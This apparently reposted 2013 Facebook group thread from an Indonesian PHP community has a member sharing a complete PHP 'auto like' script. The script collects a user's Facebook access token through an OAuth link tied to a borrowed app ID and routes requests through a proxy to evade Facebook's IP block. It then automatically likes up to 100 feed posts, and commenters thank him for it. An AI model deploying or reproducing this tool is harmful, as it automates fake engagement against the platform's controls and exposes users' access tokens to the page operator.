Rabu, 07 Agustus 2013

PHP Indonesia - Facebook: mau share auto like support main-hosting (anti blo...

PHP Indonesia - Facebook
PHP Indonesia is a community for everyone that loves PHP. Our focus is in the PHP world but our topics encompass the entire LAMP stack. Topics include PHP coding, to memcached handling, db optimizations, server stack, web server tuning, code deploying, hosting options and much much more. Youtube Channel : http://www.youtube.com/user/OurPHPIndonesia Twitter : @php_indonesia NOTE: Rules for Wall posting: https://www.facebook.com/groups/35688476100/doc/10151597056316101/ Daftar Keanggotaan : http://www.facebook.com/groups/35688476100/doc/10150671770741101/ 
mau share auto like support main-hosting (anti blo...
Aug 7th 2013, 11:43, by Musa Mustofa

Musa Mustofa 11:43am Aug 7
mau share auto like support main-hosting (anti blok ip 31.x), cari proxy https port 80
<html><head>
<title>MusaMus AutoLike</title>
<head><body style="text-align:center">
<form action="" method="post"></fieldset>
<label><a href="https;//www.facebook.com/dialog/oauth?redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fconnect%2Flogin_success.html%3F-Your+Special+Token-&scope=email&sso_key=com.jango.jango&type=user_agent&client_id=256002347743983&sdk=ios">Token</a>:<br/><input name="token" id="name"/></label><br/>
<label><a href="http;//hidemyasscom/proxy-list">Proxy(:)Port</a>:<br/><input name="proxy" name="proxy"/></label><br/>
<input type="submit" value="Thumbs Up"/></fieldset></form>
<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort(1);
if (isset($_POST['token']) && isset($_POST['proxy']) && $_POST['token'] !== '' && $_POST['proxy'] !== ''){
class musaMus{
var $proxy;
public function doCurl($url){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($c, CURLOPT_PROXY, $this->proxy);
$exec = curl_exec($c);
curl_close($c);
return $exec;
}
public function getId($json){
preg_match_all('/"([0-9]+_[0-9]+)"/', $json, $id);
return $id[1];
}
}
$set = new musaMus();
$set->proxy = $_POST['proxy'];
$id = $set->getId($set->doCurl('https://graph.facebook.com/me/home?limit=100&access_token='.$_POST['token']));
for ($i=0; $i<count($id); $i++){
$set->doCurl('https://graph.facebook.com/'.$id[$i].'/likes?method=POST&access_token='.$_POST['token']);
}
}
?>
</body></html>

Fathur Rahman 11:57am Aug 7
siip gann :D

Hadrian Bayanulhaq Siregar 12:00pm Aug 7
github / pastebin dah tutup yak :/

Musa Mustofa 12:00pm Aug 7
woh, ana mbaeh :v

Rroby Dan Rroby 12:10pm Aug 7
aku pernah pake curlopt proxy di youhost, tapi cuma loading aja... :(

Musa Mustofa 12:13pm Aug 7
Rrobyf@ emang ip kepala 31 diblok gan sama pesbuk, demo liat di http://w.areminds.com/roger/upload/resize.php

Rroby Dan Rroby 12:16pm Aug 7
ya, ok sip.. aku coba dulu bos

Musa Mustofa 12:20pm Aug 7
sama2, sebenarnya kalo hostingannya bukan pake reseller youhosting gak perlu pake CURLOPT_PROXY :D

You are receiving this email because you subscribed to this feed at blogtrottr.com.

If you no longer wish to receive these emails, you can unsubscribe from this feed, or manage all your subscriptions

Tidak ada komentar:

Posting Komentar